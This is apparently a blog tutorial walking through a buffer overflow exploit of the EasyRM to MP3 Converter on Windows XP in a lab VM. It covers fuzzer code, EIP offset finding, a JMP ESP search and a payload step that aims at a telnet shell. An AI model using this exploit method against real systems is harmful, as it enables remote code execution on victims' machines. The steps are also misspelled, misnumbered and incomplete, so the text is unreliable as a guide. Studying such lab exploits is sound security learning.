- Winxp (operating sistem)
- EasyRM to mp3 Converter (Target)
- Ollydbg (debugger)
- Fuzzer
- wsf3Web (generate payload)
Run WinXp in virtualBox
istall EasyRM to Mp3 Converter
1. Create Fuzzer
~#nano easyRM.py
#!/opt/bin/python
filename="fuzzer.m3u"
buffer="\x41"*26100
out_file=open(filename,'w')
out_file.write(buffer)
out_file.close()
filename wil be create filename fuzzer.m3u
buffer="\x41"*26100 will create String A until 26100 character
#python easyRM.py
its will excecute eassyRM.py and create fuzzer.m3u
download fuzzer.m3u using bwroser in winxp using IE,, before that run apache2
and test file fuzzer.m3u and look what will hapen
aright .. easyRM crased,..
and then debugg uding Ollydbg
register EIP filed by 414141
couse string A tu long until EIP stack filed
2. Change string "A" using pattern
#./pattern_create.rb 26100 > string.txt
check string.txt and copy to fuzzer.m3u
after edit easyRM.py,, run and use new fuzzer.m3u to load in easyRM again.. cek what will happen
see.. we get EIP = 48306C48 and ESP = 2Hl3Hl4H, it willpatter offset..
3. Pattern Ofset
filename="fuzzer.m3u"
buffer="\x90"*26070
buffer+="\xEF\xBE\xAD\xDE"
buffer+="\x90"*32
out_file=open(filename,'w')
out_file.write(buffer)
out_file.close()
oke.. after edit easyRM.py execute again and download new fuzzer.m3u to load using EasyRM, after load EasyRM will be crash, and then debug using Ollydbg
resgister EIP filed "DEADBEEF" it to test handle EIP register
3.Search JMP ESP
Run EasyRM and debug using Ollydbg
view> Execute modules>USER32
in main window search for>commad
5. Set Payload
Generate :
payload
and execute agan python file
load new fuzzer.mu3 in easyRM
cek telnet....
Tidak ada komentar:
Posting Komentar